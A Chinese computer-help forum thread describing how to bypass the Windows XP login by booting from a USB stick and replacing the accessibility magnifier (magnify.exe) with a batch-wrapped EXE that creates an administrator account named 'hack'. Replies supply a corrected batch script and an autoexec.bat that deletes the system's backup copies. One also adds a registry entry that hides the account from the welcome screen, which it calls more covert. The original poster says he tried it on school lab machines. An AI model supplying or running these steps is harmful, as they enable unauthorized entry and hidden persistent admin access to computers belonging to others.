找回密码
 立即注册

QQ登录

只需一步,快速开始

教程经验总索引TVMW5/小日本5 索引【视频转换】小日本4/TE4XP 索引【视频转换】TAW4 / TDA3 索引【DVD打包软件】
Nero 索引DVD-Lab 索引【DVD打包软件】编解码器 索引 【必读】固顶帖011号
查看: 2737|回复: 8

[转贴] [『技巧』] 用U盘绕过登录密码进入Windows XP系统

  [复制链接]

11

威望

3259

金钱

164

贡献

版主

上将

积分
3882

版主

主题
506
回帖
436
注册时间
2010-2-9
最后登录
2019-1-16
QQ
发表于 2011-8-9 14:18:14 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
用U盘绕过登录密码进入Windows XP系统
  有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在我就来给你带来解决的方法.

  所需工具
  1.U盘一个
  2.Usboot(U盘启动制作软件)

  3.winrar(压缩软件)

  这个方法我亲自实验过,并且成功的绕过了XP的登陆密码.我在学校机房做过实验,但是文件格式为FAT32,就不知道NTFS的行不行?本来想一起实验的,结果我的光驱在学校机器上用不起(我的光驱有问题,机器太老了!--穷),学校的机器都是FAT32的,没办法!只有下次做了!

  先说说思路:方法很简单,当你的机器出现登陆框,要求输入密码时,你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵呵~~意味着可以运行放大镜)。既然可以运行放大镜程序,那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(我把它换成添加用户的程序不就…………呵呵~~好坏!)思路就是这样的了!现在我们开始制作。
  ①.制作U盘启动盘。先运行Usboot,然后插入U盘,选中U盘然后点开始。(要破坏U盘上的文件哦!小心!),格式化完了把U盘拔了,然后它会提示你再插入,插入U盘1分后就可以了!我的U盘是1G的,用的HDD格式。
  ②.制作替换文件。要制作一个XX.EXE的文件来替换原文件,但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件:
  @net user hack 123456 /add

  @net localgroup administraroes hack /add

  @exit

  然后保存为XX.bat就可以了!

  又有人要问我了,我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?

  问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!

  要达到这样的目的,就要用到winrar,用winrar制作一个自解压文件,不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到 U 盘上去)

  ③.替换文件.到COMS里去把第一启动换到USB-HDD,保存----插入U盘,进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe (对magnify.exe进行备份,magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下,并该为 magnify.exe就可以了!

  然后从硬盘启动就可以了!再到XP登陆密码时,你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!

  这样就成功的绕过了XP的登陆密码,只要了一个U盘,好方便.
一般的我,一般的坏,一般的女人我不爱!

0

威望

1301

金钱

2

贡献

初级会员

初级

积分
1349
主题
3
回帖
305
注册时间
2011-5-20
最后登录
2015-5-15
QQ
发表于 2011-8-9 20:39:52 | 显示全部楼层
呵呵,登录XP不用密码真是大好了!
点拔论坛,学习电脑好帮手,是初学者的家园。
回复

使用道具 举报

9334

威望

908

金钱

1万

贡献

管理员

自由的灵魂

积分
100569
主题
5293
回帖
26240
注册时间
2003-4-10
最后登录
2024-12-21
发表于 2011-8-10 00:16:50 | 显示全部楼层
用下面的软件可以把 BAT 批处理程序变成 EXE:
[下载] 批处理到可执行文件转换器(WBatToExe) V2.1

如果最终目的是去除原来的用户密码,那么把 U盘制作成 WINPE 启动盘,然后在WINPE下运行破除密码的GUI程序会更简单一些。


IsaacZ的发言中如果提到任何字母缩写或专有名词,在本论坛中一般都能搜索到。点此立即搜索点拨论坛。如有搜索不到的,请尝试搜索百度百科,或者跟帖提问。
发帖前请注意看置顶帖。如果你发现自己的问题没有得到回答,说明你的问题提错了地方或者提问前未先阅读版规。
回复

使用道具 举报

1

威望

434

金钱

7

贡献

初级会员

积分
471
主题
0
回帖
73
注册时间
2010-3-6
最后登录
2015-5-11
发表于 2011-8-10 17:05:49 | 显示全部楼层
用新用户进入系统,那些软件,系统设置都不是原来的,而且还挺麻烦。还是用风吟多功能WinPE系统3.0里的绕过系统登入验证,直接就进入且是原来帐户的设置,试过晨枫,天意,杏雨梨云,,,就风吟的有用。
回复

使用道具 举报

51

威望

5148

金钱

228

贡献

管理员

孤魂野草

积分
6424
主题
168
回帖
2211
注册时间
2011-12-18
最后登录
2024-9-8
QQ
发表于 2012-6-22 18:43:04 | 显示全部楼层
本帖最后由 伤心的笔 于 2012-6-23 09:13 编辑

手动输入命令太麻烦,可以这样做:
将以下内容保存为autoexec.bat至U盘根目录:
  1. @echo off
  2. :改名
  3. copy "C:\Windows\System32\magnify.exe" "C:\Windows\System32\007magnify.exe"
  4. :去除文件的只读、系统及其他碍眼的属性
  5. attrib  "C:\Windows\System32\magnify.exe" -a -s -h -r
  6. attrib  "C:\Windows\System32\dllcache\magnify.exe" -a -s -h -r
  7. :将System32文件夹及dllcache的备份删除
  8. del "C:\Windows\System32\dllcache\magnify.exe" /Q
  9. del "C:\Windows\System32\magnify.exe" /Q
  10. :偷梁换柱
  11. copy XX.exe "C:\Windows\System32\007magnify.exe"
  12. echo It has finished.
  13. echo on
  14. @exit
复制代码
进入DOS后,便会自动执行替换操作,然后给你讯息。
回复

使用道具 举报

51

威望

5148

金钱

228

贡献

管理员

孤魂野草

积分
6424
主题
168
回帖
2211
注册时间
2011-12-18
最后登录
2024-9-8
QQ
发表于 2012-6-23 10:10:28 | 显示全部楼层
本帖最后由 伤心的笔 于 2012-6-30 17:28 编辑

@babykiss :不修改的话,创建的用户没有管理员权限!因为Administrators这个词你打成administraroes了!
@IsaacZ :如果babykiss没有回应,请帮忙修改,谢谢!

一个十分严重的错误!
你的替换文件中有个词打错了
XX.bat修复后为
  1. @echo off
  2. net user hack 123456 /add
  3. net localgroup Administrators hack /add
  4. exit
复制代码
回复

使用道具 举报

51

威望

5148

金钱

228

贡献

管理员

孤魂野草

积分
6424
主题
168
回帖
2211
注册时间
2011-12-18
最后登录
2024-9-8
QQ
发表于 2012-6-23 10:42:32 | 显示全部楼层
本帖最后由 伤心的笔 于 2012-6-30 18:21 编辑

补充一点,你创建的hack用户在欢迎屏幕、用户帐户中是可见的
可以这样做
  1. Windows Registry Editor Version 5.00

  2. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
  3. "hack"=dword:00000000

复制代码
这样的话,可以把XX.bat和XX.reg一起打包成XX.EXE,同时修改xx.bat为
  1. @echo off
  2. net user hack 123456 /add
  3. net localgroup Administrators hack /add
  4. regedt32 /s xx.reg
  5. exit
复制代码
这样做出来的hack用户在欢迎屏幕、用户帐户中是不可见的,需要在欢迎屏幕中两次按下Ctrl+Alt+Del输入用户名和密码登录,更安全隐秘。
回复

使用道具 举报

51

威望

5148

金钱

228

贡献

管理员

孤魂野草

积分
6424
主题
168
回帖
2211
注册时间
2011-12-18
最后登录
2024-9-8
QQ
发表于 2012-6-23 10:48:53 | 显示全部楼层

这个绕过验证后,用户的密码会被清空吗?
回复

使用道具 举报

9334

威望

908

金钱

1万

贡献

管理员

自由的灵魂

积分
100569
主题
5293
回帖
26240
注册时间
2003-4-10
最后登录
2024-12-21
发表于 2012-6-23 12:01:00 | 显示全部楼层
这样做之前,最好征得机主的同意……{:soso_e127:}
IsaacZ的发言中如果提到任何字母缩写或专有名词,在本论坛中一般都能搜索到。点此立即搜索点拨论坛。如有搜索不到的,请尝试搜索百度百科,或者跟帖提问。
发帖前请注意看置顶帖。如果你发现自己的问题没有得到回答,说明你的问题提错了地方或者提问前未先阅读版规。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|点拨论坛 |网站地图

GMT+8, 2024-12-22 14:46 , Processed in 0.076024 second(s), 2 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表